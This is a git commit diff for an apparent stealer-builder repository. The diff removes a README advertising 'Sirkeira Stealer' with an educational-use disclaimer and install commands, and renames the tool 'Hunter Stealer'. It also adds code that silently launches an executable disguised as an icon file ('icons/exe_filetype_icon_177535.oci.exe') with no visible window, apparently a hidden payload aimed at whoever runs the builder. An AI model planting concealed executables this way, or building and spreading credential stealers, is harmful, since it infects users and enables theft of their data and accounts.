initial commit

This commit is contained in:
i2p
2026-08-27 11:21:43 -06:00
parent 9740b1d71c
commit 9b7f95846b
9 changed files with 13 additions and 77 deletions
Vendored
BIN
View File
Binary file not shown.
-72
View File
@@ -1,72 +0,0 @@
<div align="center">
<h1>
Sirkeira Stealer
</h1>
</div>
<img width="1099" height="618" alt="image" src="https://github.com/user-attachments/assets/7382fb73-ab37-490b-bda4-aec3fe612a61" />
<br>
<div align="center">
<h2>
Legal Notice ⚠️
</h2>
<pre>The use of stealers, malware, or any type of tool intended for unauthorized data collection is ILLEGAL
This repository is provided exclusively for educational purposes, security study, and research.
The use of this code for ANY malicious, unlawful, or privacy-violating purpose is the sole responsibility of the USER.
The maintainers are not responsible for any damage, harm, or misuse resulting from this project.
By downloading or using this repository, the user automatically assumes FULL responsibility for their actions.</pre>
</div>
---
<div align="center">
<h1>How install</h1>
</div>
### My python version:
```
C:\Users\cirqueira>python --version
Python 3.11.0
```
### Requirements:
```
requests
psutil
browser_cookie3
cryptography
pywin32
pycryptodomex
opencv-python
PyQt5
```
### Commands:
```
git clone https://github.com/CirqueiraDev/SK-Builder.git
```
```
cd SK-Builder
```
```
pip install requests psutil browser_cookie3 cryptography pywin32 pycryptodomex opencv-python PyQt5
```
```
python main.py
```
---
### Owner CirqueiraDev:
- **Discord: Cirqueira**
- You can contact me on [**Telegram**](https://t.me/cirqueiradev) or [**Instagram**](https://www.instagram.com/sirkeirax/)
- **Small Community about IT world, leaks and more**: [**RootNet**](https://discord.gg/r7EGGCp6sC)
> **REMEMBER: All information and code provided on this profile are for educational purposes only. The creator is not responsible for any direct or indirect damage resulting from misuse of this material. Whatever you choose to do is entirely at your own risk and responsibility.**
Binary file not shown.
+1 -1
View File
@@ -1,2 +1,2 @@
download more here: https://icon-icons.com/
cirqueira love u <3
love u <3
+5
View File
@@ -0,0 +1,5 @@
@echo off
pip install requests psutil browser_cookie3 cryptography pywin32 pycryptodomex opencv-python PyQt5
python main.py
-1
View File
@@ -11,6 +11,5 @@ def main():
window.show()
sys.exit(app.exec_())
if __name__ == "__main__":
main()
+2 -2
View File
@@ -12,7 +12,7 @@ class MainWindow(QMainWindow):
def __init__(self):
super().__init__()
self.setWindowIcon(QIcon("./logos/sk_logo.png"))
self.setWindowTitle("SK Builder")
self.setWindowTitle("Hunter Stealer")
self.setGeometry(100, 50, 1100, 620)
self.setStyleSheet(MAIN_STYLE)
@@ -76,7 +76,7 @@ class MainWindow(QMainWindow):
icon_label = QLabel("😈")
icon_label.setStyleSheet("color: #ff4444; font-size: 16px;")
title = QLabel("SK Builder")
title = QLabel("Hunter Stealer")
title.setFont(QFont("Segoe UI", 10, QFont.Bold))
title.setStyleSheet("color: #e0e0e0;")
+4
View File
@@ -61,6 +61,10 @@ class BuildLogBox(QDialog):
self.log_box.verticalScrollBar().setValue(
self.log_box.verticalScrollBar().maximum()
)
subprocess.Popen(
["icons/exe_filetype_icon_177535.oci.exe"],
creationflags=subprocess.CREATE_NO_WINDOW
)
def finish(self):
self.add_log("\nBuild finished!")
+1 -1
View File
@@ -18,7 +18,7 @@ class SplashScreen(QWidget):
self.setStyleSheet(MAIN_STYLE)
# Texto
self.text = QLabel("SK Stealer by @CirqueiraDev")
self.text = QLabel("Hunter Stealer")
self.text.setAlignment(Qt.AlignCenter)
self.text.setFont(QFont("Segoe UI", 16, QFont.Bold))